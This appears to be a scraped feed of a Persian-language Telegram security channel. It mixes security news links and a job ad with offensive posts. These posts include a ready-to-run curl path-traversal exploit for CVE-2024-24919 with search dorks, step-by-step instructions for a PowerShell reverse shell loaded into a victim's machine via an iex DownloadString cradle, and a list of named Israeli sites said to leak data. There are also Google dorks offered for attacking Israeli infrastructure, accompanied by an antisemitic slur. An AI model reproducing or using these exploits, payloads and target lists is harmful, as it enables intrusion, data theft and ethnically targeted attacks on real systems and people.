Network Security Channel

اگر با توجه به تحریم ؛ امکان پرداخت و عضویت در سایت مدیوم برای خواندن مقالات را ندارید از این روش استفاده کنید لینک مقاله را در readmedium بگذارید https://readmedium.com/threat-modeling-and-risk-assessment-with-example-3d8bc6177e8d @Engineer_Computer

WebApp Security Government Emails at Risk: Critical Cross-Site Scripting Vulnerability in Roundcube Webmail https://www.sonarsource.com/blog/government-emails-at-risk-critical-cross-site-scripting-vulnerability-in-roundcube-webmail A critical security flaw in Atlassian Confluence has been exploited for cryptocurrency mining. This vulnerability, CVE-2023-22527, allows unauthorized access, leading to potential severe financial and operational damage. Read: https://thehackernews.com/2024/08/atlassian-confluence-vulnerability.html Confluence Vulnerabilty Exploited for Crypto Miners https://www.trendmicro.com/en_us/research/24/h/cve-2023-22527-cryptomining.html @Engineer_Computer

🔒 U.S. agencies have identified an Iranian hacking group, Pioneer Kitten, as the force behind a wave of ransomware attacks. Key sectors like education, healthcare, and defense are under fire, with sensitive data hanging in the balance. Read: https://thehackernews.com/2024/08/us-agencies-warn-of-iranian-hacking.html Discover how Identity Threat Detection & Response (ITDR) solutions safeguard both human and non-human identities across across multi-environment cloud services, enhancing security against sophisticated identity-based attacks. Read Guide: https://thehackernews.com/2024/08/identity-threat-detection-and-response.html ‎@Engineer_Computer

Discover how Zero-Trust Network Access (ZTNA) strengthens cybersecurity, reduces costs, and streamlines remote access. Explore best practices for seamlessly integrating ZTNA into your existing security systems. Read: https://thehackernews.com/expert-insights/2024/08/best-practices-for-integrating-ztna.html Gartner's latest CTEM report highlights Adversarial Exposure Validation (AEV) as vital for cybersecurity, combining breach simulation with pentesting to streamline security assessments, automate testing, and enhance resilience. Learn more: https://thehackernews.com/2024/08/ctem-in-spotlight-how-gartners-new.html @Engineer_Computer

کال بک هایی در سیستم عامل که بدافزار نویسان و امنیت چی ها دنبال آن هستند https://codemachine.com/articles/kernel_callback_functions.html @Engineer_Computer

گستره آلوده شدن توسط نرم افزار جاسوسی پگاسوس بزرگتر شد هدف قرار گرفته شدن افراد برای جاسوسی درمورد پگاسوس قبلا در کانال مطلب گذاشته ایم که اختصاصا برای جاسوسی از افراد طراحی شده است. https://cybersecuritynews-com.cdn.ampproject.org/c/s/cybersecuritynews.com/pegasus-spyware-detected-in-new-mobile-devices/amp/ @Engineer_Computer

نکته ی هفته : کنترل ها ( کاهنده های ریسک) از دسته های زیر هستند : ۱-جلوگیری کننده : preventive مثال: فایروال ، طراحی زیرو تراست ، گذاشتن نگهبان دم درب ۲-کشف کننده detective مثال: IDS ؛ خود SOC ؛ تاحدودی معماری زیرو تراست و هانت ۳-مدیریتی Administrative مثال: خط مشی ؛ فرآیند و ساختار سازمان لذا شما فقط نباید به ۱-چند لایه کردن فایروال نگاه کنید . بلکه باید به این نگاه کنید ۲- آیا توان کشف هم دارید ؟ ۳-آیا ساختار سازمانی شما اجازه می‌دهد به موقع لزوم، تمدید لایسنس را انجام دهید ؟ هر سه مورد فوق از کنترل های امنیت و کاهنده های ریسک هستند در زمره جلوگیری کننده ، کشف کننده و مدیریتی @Engineer_Computer

CVE-2024–24919 . Dorks Hunter: /product.name="Check Point SSL Network Extender" FOFA: title="Check Point SSL Network Extender" SHODAN: http.title="Check Point SSL Network Extender" Exploit curl -k -X POST "https://{ip}/clients/MyCRL" \ -H "Host: {ip}/" \ -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0" \ -H "Te: trailers" \ -H "Dnt: 1" \ -H "Connection: keep-alive" \ -H "Content-Length: 48" \ --data "aCSHELL/../../../../../../../../../../../etc/passwd"

با این کد پاورشل میتونید Reverse shell از سیستم های ویندوزی بگیرید: https://raw.githubusercontent.com/matitanium/github-dorks/refs/heads/master/profile.ps1 کافیه این ماژول داخل پاورشل قربانی وارد بشه تا دسترسی شما از کامپیوتر طرف برقرار بشه. مراحل اجرا:‌‌ 1. بجای IP,PORT داخل کد, آدرس و پورت سرور خودتون رو قرار بدید. 2. حالا با استفاده از یک پیلود مثل iex((New-Object Net.WebClient).Downloadstring('https://raw.githubusercontent.com/matitanium/github-dorks/refs/heads/master/profile.ps1')) میتونید ماژول رو از سرور دریافت و در سیستم قربانی اجرا کنید. دسترسی برقرار میشود!💣 نکته: این پست ها صرفا جهت استفاده در موارد آموزشی میباشد👍 @Engineer_Computer

http://tzafrir.org.il/~tzafrir/git_test/.git/ https://apache.co.il/zzz/ https://www.flutedoc.co.il/ https://pdf.melumad.co.il/ https://flashner.co.il/~efraim/ https://git.shore.co.il/nimrod/igentify/-/tree/02fa7300160b70c93bc230419f0a49b150e2fe5f https://asidesign.co.il/wp-content/uploads/ https://tuticafe.co.il/wp-content/uploads/ با یدونه از گوگل دورک های بالا ریختن بیرون @Engineer_Computer

گوگل دورک هایی برای حمله به زیر ساخت های سگیونیستی و تولید صابون: میتونین خودتون تغیراتی ایجاد کنید👍 site:*.gov.il ext:php site:*.il "admin" site:*.il "dashboard" site:*.il inurl:?id= site:*.il inurl:?cat= site:*.il ext:zip site:*.il inurl:aspx? site:*.il inurl:?id= site:*.il inurl:"index.php?id=" OR inurl:"news.php?id=" OR inurl:"gallery.php?id=" OR inurl:"product.php?id=" OR inurl:"post.php?id=" OR inurl:"static" site:*.il inurl:news.php?id= site:*.il "index of /" @Engineer_Computer

شناسایی سرور های c2 با shodan https://readmedium.com/c2-hunting-how-to-find-c2-servers-with-shodan-c23f48ac39a4 @Engineer_Computer

Extract and execute a PE embedded within a PNG file using an LNK file https://github.com/Maldev-Academy/ExecutePeFromPngViaLNK @Engineer_Computer

#استخدام سلام به دوستان و همکاران محترم یک سازمان دولتی جهت تکمیل نیروی فنی واحد مانیتورینگ شبکه به دو متخصص با دانش فنی در موارد زیر نیاز دارد : Zabbix Lpic-1 آشنایی با grafana و splunk و ccna مزیت محسوب میشود لطفا اطلاعات و رزومه خود را به تلگرام @omidfr ارسال بفرمایید یا با شماره 09122036944 تماس بگیرید @Engineer_Computer

درسته کهMISP نسبت بهYETI برتر هست ولی اگر میخواید در YETI دست به آچار بشید مقاله زیر خوبه ** پلتفرم رایگان Threat intelligence https://readmedium.com/build-your-own-cyber-threat-intel-feeds-at-home-yeti-e13b3edf9f39 @Engineer_Computer

⭕️ کیف پول "Jaxx Liberty" که اکنون در حال #فیشینگ و سرقت اطلاعات کاربران است، در گذشته (که معتبر بود) به‌عنوان یک کیف پول معتبر توسط بسیاری از صرافی‌ها و وب‌سایت‌ها معرفی شده بود. توجه داشته باشید که فعالیت اصلی این کیف پول متوقف شده است و شبکه‌ای از کلاهبرداران با استفاده از دامنه آن، اقدام به فیشینگ حساب‌های رمزارز کرده‌اند. بدیهی است که وب‌سایت‌ها و منابع معتبر باید با بروزرسانی اطلاعات خود، هشدارهای لازم درباره فعالیت جدید این کیف پول را به مخاطبان ارائه دهند. ⭕️ برای امنیت بیشتر قبل از اطمینان به هر وب سایتی، آدرس آن وبسایت را توسط هوش مصنوعی اسکم مایندر بررسی کنید. https://scamminder.com/ @Engineer_Computer

توصیه میکنم بخوانید https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec @Engineer_Computer

نیاز به مهندسی جریان داده در سازمان قبل از راه اندازی SIEM https://detect.fyi/why-you-need-data-engineering-pipelines-before-an-enterprise-siem-0be553584aa9 @Engineer_Computer